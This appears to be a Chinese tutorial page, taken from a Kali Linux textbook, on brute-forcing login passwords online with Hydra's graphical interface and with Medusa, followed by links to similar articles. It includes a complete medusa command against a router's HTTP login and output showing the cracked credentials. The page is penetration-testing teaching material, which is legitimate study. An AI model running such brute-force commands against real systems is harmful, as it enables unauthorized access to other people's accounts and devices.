Kali-Hydra和Medusa密码在线破解
为了使用户能成功登录到目标系统,所以需要获取一个正确的密码。在Kali中,在线破解密码的工具很多,其中最常用的两款分别是Hydra和Medusa。本节将介绍使用Hydra和Medusa工具实现密码在线破解。
8.1.1 Hydra工具
Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解,关键在于字典是否足够强大。很多用户可能对Hydra比较熟悉,因为该工具有图形界面,且操作十分简单,基本上可以“傻瓜”操作。下面将介绍使用Hydra工具破解在线密码。
使用Hydra工具破解在线密码。具体操作步骤如下所示。
(1)启动Hydra攻击。在Kali桌面依次选择“应用程序”|Kali Linux|“密码攻击”|“在线攻击”|hydra-gtk命令,将显示如图8.1所示的界面。
图8.1 启动界面
(2)该界面用于设置目标系统的地址、端口和协议等。如果要查看密码攻击的过程,将Output Options框中的Show Attempts复选框勾上。在该界面单击Passwords选项卡,将显示如图8.2所示的界面。
图8.2 指定密码字典
(3)在该界面指定用户名和密码列表文件。本例中使用Kali系统中存在的用户名和密码列表文件,并选择Loop around users选项。其中,用户名和密码文件分别保存在/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt和/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt中。
(4)设置好密码字典后,单击Tuning选项卡,将显示如图8.3所示的界面。
图8.3 基本设置
(5)在该界面设置任务的编号和超时时间。如果运行任务太多的话,服务的响应速率将下降。所以要建议将原来默认的任务编号16修改为2,超时时间修改为15。然后将Exit after first found pair的复选框勾上,表示找到第一对匹配项时则停止攻击。
(6)以上的配置都设置完后,单击到Start选项卡进行攻击,如图8.4所示。
图8.4 攻击界面
(7)在该界面显示了四个按钮,分别是启动、停止、保存输出和清除输出。这里单击Start按钮开始攻击,攻击过程如图8.5所示。
图8.5 攻击过程
(8)xHydra工具根据自定的用户名和密码文件中的条目,进行匹配。当找到匹配的用户名和密码时,则停止攻击,如图8.5所示。
8.1.2 Medusa工具
Medusa工具是通过并行登录暴力破解的方法,尝试获取远程验证服务访问权限。Medusa能够验证的远程服务,如AFP、FTP、HTTP、IMAP、MS SQL、NetWare、NNTP、PcAnyWhere、POP3、REXEC、RLOGIN、SMTPAUTH、SNMP、SSHv2、Telnet、VNC和Web Form等。下面将介绍使用Medusa工具获取路由器的访问权。
启动Medusa工具。在终端直接运行medusa命令,如下所示:
root@kali:~# medusa
或者在桌面上依次选择“应用程序”|Kali Linux|“密码攻击”|“在线攻击”|medusa命令,将输出如下所示的信息:
以上输出的信息显示了medusa命令的帮助信息。包括meduas命令的语法、可使用的选项及参数。用户可以根据自己的需要,选择相应的选项获取路由器的访问权。下面看一个例子的运行结果。
【实例8-1】使用medusa暴力破解地址为192.168.5.1的路由器,执行命令如下所示:
root@kali:~# medusa -h 192.168.5.1 -u admin -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-
passwd/passwds/john.txt -M http -e ns 80 -F
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: (1 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (2 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 12345 (3 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: abc123 (4 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: password (5 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: computer (6 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (7 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: huolong5 (8 of 3109 complete)
ACCOUNT FOUND: [http] Host: 192.168.5.1 User: admin Password: daxueba [SUCCESS]
以上输出的信息是破解路由器密码的一个过程。一般路由器默认的用户名和密码都是admin。但是通常,用户会将密码进行修改。所以这里指定一个密码字典john.txt,通过该字典对路由器进行暴力破解。从最后一行输出的信息,可以看到路由器的用户名和密码分别为admin和daxueba。
Kali-Hydra和Medusa密码在线破解相关推荐
- 【kali-密码攻击】(5.1.1)密码在线破解:Hydra(图形界面)
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- 【kali-密码攻击】(5.1.2)密码在线破解:Medusa
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- Kali-linux密码在线破解
为了使用户能成功登录到目标系统,所以需要获取一个正确的密码.在Kali中,在线破解密码的工具很多,其中最常用的两款分别是Hydra和Medusa.本节将介绍使用Hydra和Medusa工具实现密码在线 ...
- 国外hash(MD5、NTLM、LM、SHA)密码在线破解网站
PS:这是国外的hash密码在线破解网站列表,支持多种类型的hash密码,目前可查询破解的hash包括:MD5.NTLM.LM.SHA1.SHA 256-512.MySQL.WPA-PSK . MD5 ...
- 如何破解PDF文件密码(在线破解PDF密码)
如何破解PDF文件密码(在线破解PDF密码) fcwgw.5d6d.com 整理:凌空飞度社区 每当毕业临近的时候,毕业生都会忙着写论文,每逢此时,Adobe Reader就是最忙的了,但是有时候遇到 ...
- Linux下的暴力密码在线破解工具Hydra
PS:这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大.对于社会工程型渗透来说,有时能够得到事半功倍的效果.本文仅从安全角度去探讨测试,使用本文内 ...
- kali-linux教程 ssh密码暴力破解和防御实战
1 hydra[海德拉] Hydra是世界顶级密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具. 指 ...
- 字典生成----在线密码破解工具hydra和medusa的使用
大家好,我是SuieKa. 本次主要稍微详细分析一下字典的生成和在线密码破解工具hydra和medusa及使用案例,希望对大家学习上有帮助! 目录表 一.常见字典生成工具及使用方法 1.字典生成工具c ...
- ftp密码破解——ncrack、hydra、medusa
ftp密码破解 --ncrack.Hydra.medusa 下面和大家分享三个kali linux中的密码破解工具(ncrack,hydra.medusa),本文主要介绍一下一些关于ftp破解过程中的 ...
- 【Kali】中密码暴力破解工具hydra的使用
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...
最新文章
- poj2723详解(二分 + 2-SAT)( 两种方法求解 )
- Jenkins结合.net平台工具之Nunit
- wxWidgets 的打印演示
- 怎样阻止电脑开机自动安装大量垃圾软件
- cocoapods应用第一部分-xcode创建.framework相关
- 对抗生成网络(Generative Adversarial Net)
- List转json 顺序不一致
- 免费送瑞星产品序列号?其实送的是Trojan-Downloader.Win32.VB.lbv
- 高中计算机会考操作题网页制作,高中信息技术会考网页制作操作知识点Word
- java svn 创建分支_Eclipse下svn的创建分支/合并/切换使用
- linux怎么安装uwf命令,linux实题小练
- Origin: Piper diagram/Trilinear diagram (三线图)
- \t\t中国历代皇帝列表,中国皇帝列表,中国历代时间表,中国各朝代列表
- 再见SNDA,在离职之后
- [PHP]学生成绩管理系统
- android adb点击坐标,Android 利用adb命令 使App自动点击屏幕指定位置
- 基于Python改变图片像素大小
- Ws2_32.lib是做什么用的
- 【网络安全管理员三级鉴定题】一
- 什么是token?有什么用?
热门文章
- 数据库驱动加载失败,数据库连接失败
- 热门高薪岗位大数据开发 自学转行如何就业(自学教程 学习路线 方法建议)
- 记忆测试系统c语言,单词记忆测试器程序设计.doc
- No serializer found for class JSONNull and no properties discovered to create BeanSerializer
- ssh 原理及fingerprint异常处理
- 惠普服务器win10安装系统教程,惠普电脑如何重装系统教程 win10专业版系统安装教程...
- 关于python搜题的软件哪个好_搜题软件哪个更好?
- 三个“清洁代码”技巧将使您的开发团队效率提高 50%
- ubuntu如何安装本地deb文件
- 用python做外贸